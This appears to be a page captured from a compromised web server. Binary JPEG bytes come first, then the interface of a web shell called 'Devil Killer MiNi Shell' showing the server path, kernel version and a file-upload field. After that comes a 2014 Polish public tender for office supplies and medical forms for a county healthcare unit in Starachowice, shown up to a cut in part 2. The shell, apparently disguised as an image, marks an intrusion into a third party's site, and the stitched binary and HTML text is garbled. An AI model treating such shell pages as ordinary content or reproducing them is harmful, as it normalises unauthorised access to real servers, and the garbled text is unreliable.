JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140801/257016-N-2014.html

<p class="kh_header"><b>Starachowice: Dostawa materiałów biurowych i druków</b><br>
<b>Numer ogłoszenia: 257016 - 2014; data zamieszczenia: 01.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zakład Opieki Zdrowotnej , ul. Radomska 70, 27-200 Starachowice, woj. świętokrzyskie, tel. 041 2745202 w. 182, faks 041 2746158.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zoz.starachowice.sisco.info/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i druków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa fabrycznie nowych materiałów eksploatacyjnych do drukarek komputerowych, oraz urządzeń wielofunkcyjnych oraz materiałów biurowych takich jak:
a/ papier kserograficzny 
b/ segregatory , koperty ,
c/ skoroszyty zwykłe, skoroszyty plastikowe,




d/ teczki  kopertowe, wiązane, z gumką , skrzydłowe zapinane na rzep, 
e/ bruliony,
f/ długopisy, cienkopisy, pióra żelowe , markery, 
g/ ołówki, gumki ,klej, taśmy klejące, tusz do stempli, 
h/ dziurkacze, zszywacze, rozszywacie , zszywki, spinacze, itp. materiały biurowe.
i/  druki 
Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 5 do Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 22.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku nastąpi na podstawie przedstawionego przez Wykonawcę wykazu   wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane,  oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie: min. 2 dostawy  odpowiadające swoim rodzajem i wartością min. 15 000,00 zł dostawom lub usługom 
  stanowiącym przedmiot zamówienia, wg formuły: spełnia/nie spełnia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunku nastąpi na podstawie opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia,  wg formuły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zoz.starachowice.sisco.info/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy  Zakład Opieki Zdrowotnej 
w Starachowicach
27-200 Starachowice
Ul. Radomska 70
Dział Zamówień Publicznych i Zaopatrzenia, pok. 218.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2014 godzina 11:00, miejsce: Powiatowy  Zakład Opieki Zdrowotnej 
w Starachowicach
27-200 Starachowice
Ul. Radomska 70
w Sekretariacie pok. 222.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antyrama 21 x 29,7			szt	9
Antyrama 40x60			szt	3
Antyrama 60x80			szt	1
Antyrama 70x100			szt	6
Bibuła gładka kolor A3 12 kol.			szt	5
Bibuła krepina			szt	2
Blok do flipczartów gładki			szt	1
Blok techniczny a4		gramatura 240 mg	szt 	1
Blok techniczny A3		gramatura 240 mg	szt	10
Blok techniczny A3 kolor		gramatura 240 mg	szt	4
Blok szkolny w kratę a4			szt	11
Blok szkolny w kratę a5			szt	10
Brystol A1			szt	3
Brystol B1 kolor			szt	21
Brystol B2 kol			szt	8
Brystol offset 70x100 200G			szt	5
Brystol ofset 70x100 240G			szt	2
Cienkopis		grubość lini 0,3 mm dł. lini 1500m, kolor w zalezności od zapotrzebiowań zamawiającego (czarny, niebieski, zielony, czerwony)	szt	60
Datownik		Datownik samotuszujący, wysokość liter do 4 mm. Wersja polska: dzień, miesiąc, rok. 	szt	16
Długopis - kolor w zalezności od zapotrzebiowań zamawiającego (czarny, niebieski, zielony, czerwony)		skuwka zgodna z kolorem wkładu, automatycznie chowany wkład, grubośc lini pisania 0,6-0,7 mm	szt	312
Deska z klipsem A4 niezamykana clipboard			szt	62
Długopis żelowy kolor w zalezności od zapotrzebiowań zamawiającego (czarny, niebieski, zielony, czerwony)		Żelowy tusz zapewniający wyjątkową miękkość i płynność pisania. Wygodny uchwyt o ergonomicznym kształcie. 
 LINIA. Długość 1000 m, grubość 0,3 mm. szt	107
dziurkacz		Ergonomiczny kształt, stalowe mocne ostrza, rozstaw otworów 80 mm, śr otw 5 mm, Antypoślizgowa nakładka, ogranicznik formatu A4 A5 A6, trwała metalowa konstrukcja do 25 kartek 	szt	9
Etykieta krusząca 50/30		kpl= kalka żywiczna 1 rolka, etykieta krusząca 2 rolki etykiet na rolce 1000 szt do drukarki Zebra typ TLP 2844	rol	4
etykieta samoprzylepna 105x42,3			op	2
Etykieta samoprzylepna 105x37 a100szt			op	1
Etykieta samoprzylepna 297x210 a 100 szt			op	1
Etykieta samoprzylepna 52x21 100 szt			op	10
Etykieta samoprzylepna 64,3x33,8 a 100szt			op	9
etykieta samoprzylepna 97x42,4			op	15
flamastry 4 kolory		grubość lini 3 mm	op	3
folia laminacyjna A3		grubośc 80 m?	op	4
folia laminacyjna A4		grubośc 80 m?	op	10
Grzbiet do bindowania 12mm			op	8
Identyfikator		z wsuwaną wkładką na klips z agrafką	szt	320
Kalendarz książkowy A4			szt	2
Kalendarz książkowy A5			szt	26
Kalendarz biurkowy stojący			szt	6
Kalka A3/20 bl.			op	1
Kalka ołówkowa A4	opak.
a 100 szt		op	3
Kartki samoprzylepne 50x40		nie pozostawiające śladów kleju, kolory mix, żółte	szt	41
Kartki samoprzylepne 30x50		nie pozostawiające śladów kleju, kolory mix, żółte	szt	200
Kartki samoprzylepne 76x76		nie pozostawiające śladów kleju, kolory mix, żółte a 10	op	65
Karton int. A1			szt	5
karton offs b1			szt	5
Karton wizytówkowy a 20szt 210x297mm			op	2
Kaseta barw Epson erc 22			szt	5
Kaseta do streamera LTO-3 Ultrium-3			szt	8
Koperty RTG 37 x 45 cm		białe lub szare	szt	750
KLej sztyft		bezbarwny, nietoksyczny, zmywalny, do klejenia papieru i tektury 20g 	szt	66
Koperty bąbelkowe B5		białe	szt	100
Koperta biała C4	 opak.
a100 szt	białe, nieklejone 	op	50
koperta biała c6	 opak.
a100 szt	Koperta. C6 HK biała 80g 	op	15
Koperta  B5 (biała i brąz)	opak.
a 100 szt	nieklejone, kolor brąz lub biała- kolor w zależności od zapotrzebowań Zamawiającego	op	400
Koperta na płyty CD-r a 100szt	opak.
a 100 szt	Z okienkiem, okienko wielkości pola zapisu płyty CD-R OPK=100	op	150
Korektor pióro		metalowa końcówka, szer.linii 1mm, poj. 8ml, typ-Tipp-Ex	szt	184
Korektor taśmowy		Wymiary taśmy 5mm x 8 m, typ TIPP-EX	szt	20
Koszulki A4 z zakładką / 10szt		grubość 120 m?	op	84
Koszulki na dokumenty A4 a 100 szt		przezroczyste, wykonane z folii, 100 szt w opakowaniu, grubość folii 50 m?	op	180
Koszulki na dokumenty A4 z klapą		przezroczyste, wykonane z folii, 10 szt w opakowaniu, grubość folii 150 m?	szt	5
Kubek styropianowy 250ml a 40	opak.
a 40 szt		op	40
Linijka 20cm			szt	7
Litery duże		wys. 5 cm 	kpl	40
Łyżki jednorazowe	opak.
a 100 szt		op	15
Marker (czarny, czerwony, zielony niebieski)		Marker wodoodporny, z okrągłą końcówką. Przystosowany na metal, szkło, plastik, gumę i gruby papier. Kolor w zależności od zapotrzebowań Zamawiającego	szt	450
Marker do tablic a 4szt+gąbka		 z okrągłą końcówką	kpl	20
Marker CD/DVD			szt	20
Masa papierowa 420G			szt	6
Nożyczki 20 cm			szt	20
Okładka do bindowania A4 bezbarwna			op	2
Okładka do bindowania A4 różne kolory		Nieprzezroczyste, kolor w zależności od zapotrzebowania Zamawiającego	op	4
Ołówek z gumką			szt	20
Papier kolor A4/80G 			ryza	2
Papier ksero A3		500 kartek w ryzie, w orginalnym opakowaniu, klasa C, gramatura 80g/m2, białość CIE 146-153, nieprzezroczystość większa lub równa 91%, wilgotność 3,8-5%	ryza	73
Papier ksero A4		500 kartek w ryzie, w orginalnym opakowaniu, klasa C, gramatura 80g/m2, białość CIE 146-153, nieprzezroczystość większa lub równa 91%, wilgotność 3,8-5%	ryza	3 100
Papier ksero A5		500 kartek w ryzie, w orginalnym opakowaniu, klasa C, gramatura 80g/m2, białość CIE 146-153, nieprzezroczystość większa lub równa 91%, wilgotność 3,8-5%	ryza	650
Papier pakowy			kg	6
Papier wizytówkowy A4 20 szt			op	2
papier ksero a4 160		kolor w zaqleżności od zapotrzebowań Zamawiającego	ryza	1
Pinezki tablicowe			op	6
Plastelina 12-kolorowa			szt	4
Plastelina 6 - kolorowa			szt	1
łyta Blue Ray 25GB			szt	50
Płyta CD-R (printable)	 opak. a 100 szt	Bez kalkomani, z czystym polem do zapisu, pole do zapisu dobrze chłoniące tusz drukarki atramentowej	op	150
Płyta DVD+R			szt	135
Półka podłużna przez.dual			szt	50
rolka do kas 60/30 term			szt	10
rolki kas 57/30 termoczułe			szt	100
Rolka Kasowa termiczna 80x50			szt	50
Rolka termiczna 110mmx20m			szt	60
rozszywacz		Uniwersalny rozszywacz do wszystkich rodzajów zszywek 	szt	10
Segregator A4 grzbiet 7,5cm		wykonany z twardej 2 mm tektury, pokryty z zewnątrz matową folią PP, wewnątrz wyklejka papierowa, mechanizm dźwigniowy z dociskiem, grzbiet o szerokości 75 mm, oczko grzbietowe, okucia owalne na przedniej okładce, dolne krawędzie wzmocnione metalową listwą, kolor w zależności od zapotrzebowań Zamawiającego (czarny, czerwony, niebieski, zielony)	szt	350
Segregator A4 grzbiet 5cm, wykonany z twardej 2 mm tektury, pokryty z zewnątrz matową folią PP, wewnątrz wyklejka papierowa, mechanizm dźwigniowy z dociskiem, grzbiet o szerokości 50 mm, oczko grzbietowe, okucia owalne na przedniej okładce, dolne krawędzie wzmocnione metalową listwą, kolor w zależności od zapotrzebowań Zamawiającego (czarny, czerwony, niebieski, zielony)
	szt	50
				
Skoroszyt plastik do wpinania		Wykonany z folii PCV, przednia okładka przezroczysta, tylna kolorowa (różne kolory), Wsuwany pasek opisowy, zaokrąglone rogi, przystosowany do wpinania w segregator	szt	600
skorowidz alfabetyczny A4			szt	8
Spinacze biurowe 28			szt	208
Spinacze biurowe duże 50			szt	40
tablica korkowa 60*40			szt	6
tablica korkowa 90*60			szt	5
tablica korkowa 90*120			szt	2
Taśma biurowa klejąca		szer. 20mm	szt	180
Taśma do metkownicy		Kolory w zalezności od zapotrzebowań Zamawiającego (biała, czerwona, zielona, żółta)	szt	60
Taśma do pakowania 50mm			szt	1 200
taśma dwustronna			szt	4
teczka a4 z gumką plastikowa			szt	50
Teczka papierowa wiązana		Białe, karton 200 g/m2	szt	2 100
Teczka papierowa z gumką		Białe, karton 200 g/m2	szt	500
Teczka plastikowa wiązana			szt	35
tusz do stempli czerwony		do stempli ręcznych i samotuszujących, różne kolory(czarny, czerwony, niebieski, zielony)	szt	60
Zakreślacz (różne kolory)			szt	90
Zeszyt A4 96 kartek		twarde okładki, kratka	szt	250
Zeszyt A5 32 kartki		kratka	szt	80
Zeszyt A5 60 kartek		sztywne okładki, kratka	szt	150
Zeszyt A5 96 kartek		sztywne okładki, kratka	szt	80
Zeszyt pap.kolorowych A4			szt	10
Zszywacz		z wbudowanym rozszywaczem	szt	80
zszywacz 100 kart			szt	3
Zszywki 24/6			op	800
Zszywki 23/13			op	22
Zwilżacz glicerynowy do palców		pojemność: 20 ml	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Druk Informacja dla lekarza kierującego		wielokopia A4 bloczek a 100	szt	260
Druk Karta drogowa 		A5 dwustronna bloczek a 5	bl	10
Druk karta stażu pracy		A4  dwustronna gramatura 240 g/m3	szt	500
Druk Karta uodpornienia 		A4 dwustronna gramatura 240g.m2	szt	1 000
Druk karta znieczulenia wielokopjujące  2 razy		A4	bl	80
